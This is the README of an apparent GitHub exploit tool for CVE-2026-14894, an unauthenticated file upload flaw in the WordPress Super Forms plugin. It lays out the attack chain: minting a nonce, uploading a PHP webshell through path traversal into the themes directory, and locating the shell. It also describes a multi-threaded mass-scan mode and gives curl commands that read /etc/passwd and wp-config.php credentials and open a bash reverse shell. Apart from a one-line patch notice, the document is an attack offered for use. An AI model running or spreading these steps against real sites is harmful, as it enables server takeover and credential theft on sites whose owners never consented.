1beelze/CVE-2026-14894

GitHub: 1beelze/CVE-2026-14894

针对 WordPress Super Forms 插件未认证文件上传导致远程代码执行漏洞(CVE-2026-14894)的 Python PoC 利用工具,支持单目标和批量扫描。

Stars: 0 | Forks: 0

# CVE-2026-14894 — Super Forms ≤ 6.3.313

## 概述 WordPress 插件 [Super Forms](https://wordpress.org/plugins/super-forms/) **≤ 6.3.313** 版本中的**未认证任意文件上传 → 远程代码执行**。 该漏洞存在于 AJAX handler `super_submit_form` 中,它通过 `datauristring` 字段处理文件上传,在写入磁盘之前未验证文件扩展名或 MIME 类型。未经认证的攻击者可以上传 PHP webshell,并在目标服务器上实现完全的远程代码执行。 ## 漏洞详情 | 字段 | 详情 | |--------------------|-----------------------------------------------------------------| | **CVE ID** | CVE-2026-14894 | | **插件** | Super Forms (WordPress) | | **受影响版本** | ≤ 6.3.313 | | **已修复** | 6.3.314 (强制添加 `.pdf` 扩展名 + `realpath` 限制) | | **CVSS** | 9.8 Critical | | **需要认证** | 无 | | **研究员** | andrea bocchetti | | **AJAX Action** | `super_submit_form` | | **注入点** | `datauristring` 字段 → `class-ajax.php:2762–2766` | | **上传路径** | `/wp-content/uploads/superforms/YYYY/MM/<13digits>/` | ## 攻击链 ``` [1] Mint nonce (nopriv) POST /wp-admin/admin-ajax.php action=super_create_nonce │ ▼ [2] Upload PHP shell via datauristring (unauthenticated) POST /wp-admin/admin-ajax.php action=super_submit_form data={"sf_upload_field":{"files":[{"datauristring":"data:image/png;base64,..."}]}} │ ├── Path Traversal → /wp-content/themes//shell.php ← primary │ (always exec) │ └── Random folder → /wp-content/uploads/superforms/... ← fallback (exec depends on server policy) │ ▼ [3] Shell Discovery ├── S0: media?parent=entry_id (WP REST) ├── S1: REST /wp/v2/media search (unauth) ├── S2: Apache/nginx directory listing └── S3: WP sitemap attachment XML │ ▼ [4] RCE → curl "http://target/wp-content/themes/theme/shell.php?c=id" ``` ## 环境要求 ``` pip install requests urllib3 ``` - Python 3.8+ - 目标 WordPress 站点的网络访问权限 ## 用法 ### 单一目标 ``` python cve-2026-14894.py ``` ``` CVE-2026-14894 │ Super Forms ≤ 6.3.313 Unauthenticated File Upload → Remote Code Execution Researcher: andrea bocchetti | PoC: Beelze 1 Single target 2 Mass targets (file) Mode (1/2): 1 Target URL : https://target.com Form ID (enter=auto) : ← leave blank = auto-discover Shell name (enter=random): ← leave blank = random name Shell file (enter=built-in): ← leave blank = built-in shell WP user (optional/REST) : ← optional, improves discovery WP pass (optional/REST) : ← optional ``` **成功时的预期输出:** ``` ────────────────────────────────────────────────────────────── TARGET https://target.com ────────────────────────────────────────────────────────────── Super Forms v6.3.301 vulnerable ≤6.3.313 [1/3] Mint nonce ...................... ✔ OK a3f9e1c... sid=sess_ab... [2/3] Upload [xkqmhzjt.php] .......... ✔ OK form_id=42 entry_id=137 [3/3] Shell discovery ................ ✔ FOUND → RCE [path traversal → theme] ╔══════════════════════════════════════════════════════════════╗ ║ ✓ PWNED → RCE CONFIRMED ║ ║ ║ ║ Shell » https://target.com/wp-content/themes/astra/shell ║ ║ RCE » uid=33(www-data) gid=33(www-data) ║ ║ ║ ║ $ curl "https://target.com/...shell.php?c=whoami" ║ ╚══════════════════════════════════════════════════════════════╝ ``` ### 批量扫描 ``` Mode (1/2): 2 Targets file : targets.txt ← one URL per line, # = comment Form ID (enter=auto) : Threads (enter=5) : 10 Shell file (enter=built-in): WP user (optional/REST) : WP pass (optional/REST) : ``` **targets.txt 格式:** ``` # Bug bounty 范围 https://site1.com https://site2.com https://site3.com ``` **批量扫描输出:** ``` ══════════════════════════════════════════════════════════════ MASS SCAN 3 targets threads=10 ══════════════════════════════════════════════════════════════ [01/03] https://site1.com .... RCE uid=33(www-data) ↳ https://site1.com/wp-content/themes/astra/xkqmhzjt.php [02/03] https://site2.com .... WRITE no exec ↳ https://site2.com/wp-content/uploads/superforms/2026/07/.../shell.php [03/03] https://site3.com .... FAIL plugin inactive / blocked ══════════════════════════════════════════════════════════════ SUMMARY 1 RCE 1 WRITE_ONLY 0 MAYBE / 3 total ══════════════════════════════════════════════════════════════ RCE SHELLS: » https://site1.com/wp-content/themes/astra/xkqmhzjt.php (uid=33...) ``` ## 自定义 Shell 你可以提供自己的 shell 文件来代替内置的 webshell: ``` Shell file (enter=built-in): /path/to/myshell.php ``` 该工具将上传你的文件,并将任何带有非空正文的 `200` 响应视为 RCE 成功的确认。 ## Shell 交互 获取 RCE 后,与 shell 进行交互: ``` # 命令执行 curl -sk "https://target.com/wp-content/themes/theme/shell.php?c=id" curl -sk "https://target.com/wp-content/themes/theme/shell.php?c=cat+/etc/passwd" # 读取 WordPress config(creds、DB) curl -sk "https://target.com/.../shell.php?c=cat+/var/www/html/wp-config.php" # Reverse shell curl -sk "https://target.com/.../shell.php" --data "c=bash+-c+'bash+-i+>%26+/dev/tcp/LHOST/LPORT+0>%261'" ``` ## 输出 结果会自动保存至: ``` ~/Documents/CVE-2026-14894/result_YYYYMMDD_HHMMSS.json ``` ## 状态码 | 状态 | 含义 | |-----------------|---------------------------------------------------------------------| | `RCE` | 确认 PHP shell 已执行 — 完全的远程代码执行 | | `WRITE_ONLY` | 文件已写入但 PHP 未执行(引擎关闭 / .htaccess 拒绝) | | `POSSIBLE_WRITE`| 上传返回成功,但无法解析 shell URL | | `FAIL` | 插件未激活,nonce 失败,或检测到已修复版本 | ## 缓解措施 将 **Super Forms** 更新至 **≥ 6.3.314**。该补丁在 `datauristring` 上传中强制要求 `.pdf` 扩展名,并添加了 `realpath()` 限制以防止路径遍历。 ## 免责声明

CVE-2026-14894 · Super Forms ≤ 6.3.313 · 未认证文件上传 RCE
研究员:andrea bocchetti · PoC:Beelze

标签:CISA项目, Python, Web安全, WordPress, 无后门, 编程工具, 蓝队分析, 远程代码执行, 逆向工具